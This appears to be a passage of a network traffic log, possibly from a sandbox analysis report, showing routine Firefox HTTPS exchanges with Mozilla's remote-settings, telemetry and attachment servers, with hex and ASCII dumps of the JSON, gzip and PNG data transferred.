2024-07-26 18:11:04 UTC	730	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nM62XHbWYD5IhQz9UcaZdSsRgnaBa47dqN2Sc6fx3SG3IdIo3CmZsKWoX2mYyClYNFzS68 x-goog-generation: 1678716169503587 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2530 x-goog-meta-goog-reserved-file-mtime: 1654282199 x-goog-hash: crc32c=ktSBxQ== x-goog-hash: md5=R11Z6mp2kmVrlLVPtA2OsA== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 2530 Server: UploadServer Date: Fri, 26 Jul 2024 03:41:45 GMT Cache-Control: public,max-age=604800 Age: 52159 Last-Modified: Mon, 13 Mar 2023 14:02:49 GMT ETag: "475d59ea6a7692656b94b54fb40d8eb0" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	660	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 09 a9 49 44 41 54 78 da ed 98 55 88 96 59 18 c7 77 d7 1c 1d 63 74 c6 ee 9c 11 bb 63 44 6c 45 05 2f 04 03 03 c1 44 ec 02 bb c5 ee ba 11 5b 19 6b c6 6e 18 03 2c 50 04 11 ec 0e 6c ec 9c fd f1 fd d9 87 c3 ee d5 7e 5e ed f2 fc 2e 3e de ef bc 27 9e 73 9e 3c ef 6f bf 39 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e f3 1f 23 73 e6 cc fc fe 11 a1 49 93 26 d3 a6 4d 5b b5 6a d5 dc b9 73 7b f7 ee 9d 27 4f 1e f5 f9 3d 02 0f 99 32 65 a2 1b 43 72 e4 c8 11 13 13 c3 6f ce 9c 39 79 88 8d 8d 0d 27 54 67 c8 95 2b 57 96 2c 59 72 e7 ce cd Data Ascii: PNGIHDRL\IDATxUYwctcDlE/D[kn,Pl~^.>'s<o988888888888888888888#sI&M[js{'O=2eCro9y'Tg+W,Yr
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 33 8c 1a 35 4a 62 44 83 69 af 55 ab 56 b6 37 c4 c5 f4 36 6d da 64 a7 43 2c 0a cf 85 51 47 8e 1c 09 55 25 c6 8d 1b 27 a1 cd d3 13 13 13 cd f6 bf 47 a0 ff fc f9 f3 79 35 63 c6 8c 70 33 9a a1 66 cd 9a a6 69 6c e2 ce 9d 3b 5a e5 fe fd fb 75 eb d6 45 0c 33 bd c3 87 0f 87 06 b1 64 c9 12 f3 80 49 93 26 21 61 ed da b5 4d 61 ec c8 02 1a 94 2a 55 ca 3a cb c8 18 ae a3 38 77 ee 9c ac e1 fd fb f7 a6 30 5e 3d 7e fc 58 3a 7b fa f4 69 d5 aa 55 5b b7 6e 6d ee b8 7f ff fe e8 a3 bf fc 8e 87 b6 6d db 7e f9 f2 45 db 1b 3b 76 2c 2d 9d 3a 75 b2 93 ed d2 a5 4b 18 97 e1 c9 93 27 12 9d 80 88 0b 6b 33 5b b7 6e 0d dd 90 ce 04 25 33 c3 33 67 ce 48 68 24 a6 db ee dd bb 65 d7 0c d7 54 fc 12 82 cc e8 88 e6 28 40 02 9c 3e 7d 9a 21 f9 f2 e5 fb f0 e1 83 ce ee d0 a1 43 a6 66 20 34 5b c0 99 Data Ascii: 35JbDiUV76mdC,QGU%'Gy5cp3fil;ZuE3dI&!aMa*U:8w0^=~X:{iU[nmm~E;v,-:uK'k3[n%33gHh$eT(@>}!Cf 4[
2024-07-26 18:11:04 UTC	480	IN	Data Raw: 10 14 bd f9 87 95 65 18 1c 74 f4 56 2a 24 27 27 9b 33 92 e2 54 83 d2 4e 7c d0 3d 25 3d 3d 5d 03 11 48 9d 35 39 55 a3 c5 77 82 32 8d c4 6e 5d 35 75 bd a2 45 07 ad 96 f1 e3 c7 9b a6 a9 f6 c2 7b 80 7d 3c d0 33 31 87 73 b1 24 9c 94 94 64 0a 30 5b 46 49 52 98 44 b2 92 91 e0 66 dd 94 30 80 3e e1 70 5c 2d bc 3c 73 55 96 2d da 99 58 67 0e 24 fc cc 17 65 2d 84 64 18 51 18 9d 4d 94 09 13 26 84 5f 4c 09 3b e6 da 2a 45 68 dc b6 6d 9b 0d 19 3a 74 a8 f5 e7 40 cd b1 48 00 61 ac 00 6e 70 fa 68 63 55 ac 4a 3a ed 9c c3 e5 50 f4 ca 3a e8 81 eb 12 d1 4c e6 af 4f 11 d0 a1 43 87 f0 fb 95 7d 3b 92 3c 16 1f f4 31 4e db 04 e4 b1 38 c6 6d cb 6a 04 fb 18 67 6f 53 53 53 6d 8f 26 0f 77 6c 2b 61 a2 b9 0c 87 c3 78 88 8f 8f 9f 3a 75 2a a7 99 96 96 46 e2 c5 7e 09 76 ea 60 dd c8 60 a5 23 Data Ascii: etV$''3TN\|=%==]H59Uw2n]5uE{}<31s$d0[FIRDf0>p\-<sU-Xg$e-dQM&_L;Ehm:t@HanphcUJ:P:LOC};<1N8mjgoSSSm&wl+ax:u*F~v``#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	64258	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 932 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:04 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	64262	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2611 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:04 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	64260	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	618	OUT	POST /submit/firefox-desktop/newtab/1/b4c0acd6-2680-4a31-8661-6638c611e2a0 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-encoding: gzip content-length: 500 content-type: application/json; charset=utf-8 date: Fri, 26 Jul 2024 19:27:31 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:04 UTC	500	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 75 92 db 6e e3 20 10 86 df 85 db 06 0b 1c c7 8e fd 1a 9b d5 5e ac 56 08 9b 89 83 4a c0 05 dc 6c 54 e5 dd 3b d8 ce a1 27 09 d9 62 e6 9b d3 3f bc 91 41 db 5e 68 bb 77 a4 79 23 01 5e 48 53 ae 48 88 d2 47 11 f5 11 48 43 72 96 af 29 67 94 15 3b 5e 34 05 7b 62 bc 61 8c ac 08 58 f5 c0 14 94 55 34 2f 77 7c d3 e4 15 c2 33 e3 41 06 67 91 e8 dc 71 70 16 6c c4 62 3a 92 cb 8a 74 46 cf d7 b9 76 04 03 47 88 fe 2c 82 7a 16 ed a8 8d c2 b0 cd 3a cb b3 94 e8 a4 ad 72 a7 30 3b 84 1d 8f 2d 78 d2 f0 9a 15 9b 15 91 c3 20 ba 83 b4 16 0c c6 78 cc 24 03 60 90 f4 dd 41 47 e8 e2 e8 53 97 ff b7 a5 28 0b b4 bb 80 b7 3f 73 46 32 87 2b 1d 06 23 cf e2 15 7c d0 53 c7 9c 6f 33 96 f1 09 7f 34 b3 a9 9f 14 73 6d 32 29 c4 ea bc ca d7 f9 26 df a2 d3 b8 4e 9a 54 11 Data Ascii: un ^VJlT;'b?A^hwy#^HSHGHCr)g;^4{baXU4/w\|3Agqplb:tFvG,z:r0;-x x$`AGS(?sF2+#\|So34sm2)&NT
2024-07-26 18:11:04 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:04 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	64261	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2611 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:04 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	64263	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	334	OUT	GET /main-workspace/quicksuggest/118946fc-cb7b-4340-a9e0-a565a5c8876b HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	690	IN	HTTP/1.1 200 OK x-goog-generation: 1721840737999575 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 25060 x-goog-hash: crc32c=U0rX8w== x-goog-hash: md5=X0nspVyzSXD+d4rHya3lfQ== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 25060 X-GUploader-UploadID: AHxI1nMQGk5zGEMUado80ZkZhdz2EPxmHSr_Z-WG4JHUSXAhBa0PWk-81_swFVaqlBXEuWHgvOY6nzJzgg Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:38 GMT ETag: "5f49eca55cb34970fe778ac7c9ade57d" Content-Type: application/octet-stream Age: 175255 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	700	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0c 02 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDRL\pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RD
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 36 39 61 65 62 65 66 2d 35 30 33 31 2d 30 36 34 33 2d 61 31 62 33 2d 63 63 36 34 34 37 36 37 64 63 39 30 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 63 38 30 33 38 37 37 37 2d 62 66 32 36 2d 34 62 32 65 2d 61 62 38 30 2d 64 61 38 64 63 39 63 34 30 32 33 34 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 36 37 33 39 31 31 42 41 45 39 46 32 30 36 30 42 31 39 32 32 44 37 41 34 36 31 41 31 38 36 33 36 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 Data Ascii: ns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:269aebef-5031-0643-a1b3-cc644767dc90" xmpMM:InstanceID="xmp.iid:c8038777-bf26-4b2e-ab80-da8dc9c40234" xmpMM:OriginalDocumentID="673911BAE9F2060B1922D7A461A18636" dc:format="imag
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 63 61 34 39 64 37 36 37 2d 37 33 34 31 2d 34 65 34 37 2d 39 34 33 38 2d 64 62 38 65 61 36 64 39 37 62 62 32 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 35 30 3a 35 31 2d 30 34 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 63 6f 6e 76 65 72 74 65 64 22 20 73 74 45 76 74 3a 70 61 72 61 6d 65 74 65 72 73 3d 22 66 Data Ascii: :li stEvt:action="saved" stEvt:instanceID="xmp.iid:ca49d767-7341-4e47-9438-db8ea6d97bb2" stEvt:when="2022-06-01T10:50:51-04:00" stEvt:softwareAgent="Adobe Photoshop 22.3 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="f
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 00 04 46 72 9a 63 99 45 a8 fa 37 0e 16 29 7f ee a6 e8 88 8f 68 4e 11 20 be f8 d6 ec b8 b3 86 77 ec a0 a4 28 99 84 29 b5 64 c1 4b f4 82 c0 f0 4e cd f1 b2 2f fd 0f 00 48 b6 99 a8 68 68 ea c1 27 b6 a9 b6 f0 53 7f 1c 75 c8 9b 90 41 62 14 58 96 00 e3 3e 74 6d 72 fc 5b b3 9e ed 22 6b 69 a8 5b d5 b2 21 33 aa 30 57 d2 c3 cb 7e fc e1 1f 04 00 00 30 3b 2f bd 08 6c 73 5b bf 83 e0 33 d7 c5 f3 2e 00 97 88 22 77 e0 3d 01 58 1f 40 30 ee e3 3f ad 9f f2 de 1d 43 05 3b a1 c1 19 61 0b 41 e4 10 19 5f 89 0e f8 df 4c 00 22 00 00 03 12 60 18 0c 3c dd cf 21 7c fa 8f 9d 07 1d cf 2e 29 28 34 41 50 80 63 42 64 ca 1c e7 a2 32 ea b3 ff 9e 1d 7b fe 70 b7 a3 84 84 27 23 2c 0b 83 ff 10 41 2f 05 88 ec d0 7b 43 ca 91 63 30 9e 91 41 8a 66 2b ab 4c a8 7c ee 97 95 c3 2e c8 01 b4 88 09 49 01 Data Ascii: FrcE7)hN w()dKN/Hhh'SuAbX>tmr["ki[!30W~0;/ls[3."w=X@0?C;aA_L"`<!\|.)(4APcBd2{p'#,A/{Cc0Af+L\|.I
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: fe 98 f5 7b 01 12 12 27 fe ef ab 8f 80 1e 21 57 19 b0 45 ab c2 a6 33 a6 1a 7c ea 47 6d f3 4e e7 14 9a 02 fa 25 78 0f 58 10 32 58 44 40 05 cc 12 38 22 70 c0 85 0c e3 cf 5f 8b 07 9f 27 b6 35 43 7c ba 27 0e 18 27 28 00 c4 dc 80 43 ef 42 c4 f0 33 d7 a7 87 9f 6f 36 6d 2b a5 49 60 65 bd e8 1c dc f3 b8 fc b8 0b fb 59 62 ff 40 28 52 1b 34 8b d0 00 c9 a0 08 94 25 bf 2b 11 f4 46 1d c4 98 01 19 25 b1 47 ef 1c 08 a7 c2 3c b3 75 e1 55 0d db 3b 47 35 d2 46 fa e7 af d8 67 1e cf da 85 da f3 80 f2 a1 1f 6c 4d dc 3b df f1 58 e4 fb 1d eb 4c b7 c7 36 7f 11 a6 b7 cf 95 91 4c a5 21 63 eb 7d e9 7b 2f 8e 8f 78 1b 03 64 11 34 81 63 e7 90 64 16 62 e0 80 11 3c 21 a1 40 74 12 58 02 66 20 5b 9a f4 a5 7f cc ae 7c 6b c7 03 d7 a6 71 9e 1f 74 b8 02 d0 1e 73 28 23 35 00 64 04 91 fc fc ef Data Ascii: {'!WE3\|GmN%xX2XD@8"p_'5C\|''(CB3o6m+I`eYb@(R4%+F%G<uU;G5FglM;XL6L!c}{/xd4cdb<!@tXf [\|kqts(#5d
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: e2 a0 63 f9 a9 95 f6 99 95 41 7b 8b ed 58 61 75 1e b4 b4 2b 51 7f 5f 37 a5 f8 d1 7f 1b 7b c2 c7 0c 00 30 68 01 f6 d9 87 e5 fc eb 74 85 0c 8d 11 a2 b0 ca 80 ec 0a 44 e1 1e ba 3b 09 89 66 1d 4d 08 32 03 64 94 d2 03 38 4b 02 00 09 08 c0 0b 04 49 60 80 05 86 72 ee 59 fd bd 5b e2 55 0f 63 39 05 1c 6d 64 d5 eb 4c 73 25 48 6b aa c8 1c b4 dc fe 67 44 13 f7 71 64 14 3b 42 e9 11 c2 49 fb 79 6d c4 c2 1b 44 54 7d a1 10 7a 3d 95 30 0b b6 c0 ce 51 90 e7 3c d4 6c f8 77 7c 2b 7c e7 57 dd f2 1b e4 e5 9f 35 4f de c6 a6 1c ef 7b 64 80 05 da 41 ab db 34 82 e7 1c 46 ed 11 4e 9d e9 af fc 68 70 cd cd c5 e3 f7 f9 ed db a1 7f b5 7d 6a 51 b2 d7 e9 ad 09 7b b7 1d 71 6e ef c6 55 b0 63 5d 09 46 01 49 ab 0b ea e7 a1 3c b5 9f fa 4e ed d8 4f 4a 07 08 60 64 4b 42 ee a6 ce 6d 88 a8 b9 f6 Data Ascii: cA{Xau+Q_7{0htD;fM2d8KI`rY[Uc9mdLs%HkgDqd;BIymDT}z=0Q<lw\|+\|W5O{dA4FNhp}jQ{qnUc]FI<NOJ`dKBm
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 5b 51 5a bc 26 9c b8 27 1f f2 26 29 b4 dd b4 34 bf ec 82 b6 de 0d d9 d4 30 e7 58 39 19 d8 96 74 de 0b f9 c2 93 d8 6b a0 84 09 47 e4 10 82 f7 0c 5e 84 26 cb 8b c1 1e f7 ae 9f 86 1f fe b7 fc ba 2b f3 7f fb 44 f1 ec f2 e0 b0 33 58 75 58 4e 1c 8a 98 09 6d 2e 84 ac ee 77 da 40 b2 cd ac 7a bc 12 33 2f bd bf 51 52 e1 9e 47 25 42 13 e7 d2 95 1d f8 3a 89 72 fb 34 57 7f 3c f8 ee 97 a2 4e 03 6d 25 c7 01 92 d2 79 91 3f f5 98 3c fa 3c 1f 74 c4 be 45 64 01 e2 82 84 78 de f0 46 24 44 42 44 83 ca 42 33 84 22 da f7 c4 c4 73 ba fc 1e 0c 49 c0 68 92 4d c0 c2 a8 b1 31 98 6c e1 9d 8d 2a 94 f7 38 46 12 60 01 88 28 84 75 c8 16 49 00 22 20 a0 13 c4 12 d9 02 1b 41 74 e4 9b 79 c7 d3 c1 75 7f c6 c6 e2 ac 34 c5 fd e7 bb 4b 3b d6 fb 89 13 a2 46 17 02 48 57 77 c4 85 d6 7a 57 c9 2b af Data Ascii: [QZ&'&)40X9tkG^&+D3XuXNm.w@z3/QRG%B:r4W<Nm%y?<<tEdxF$DBDB3"sIhM1l*8F`(uI" Atyu4K;FHWwzW+
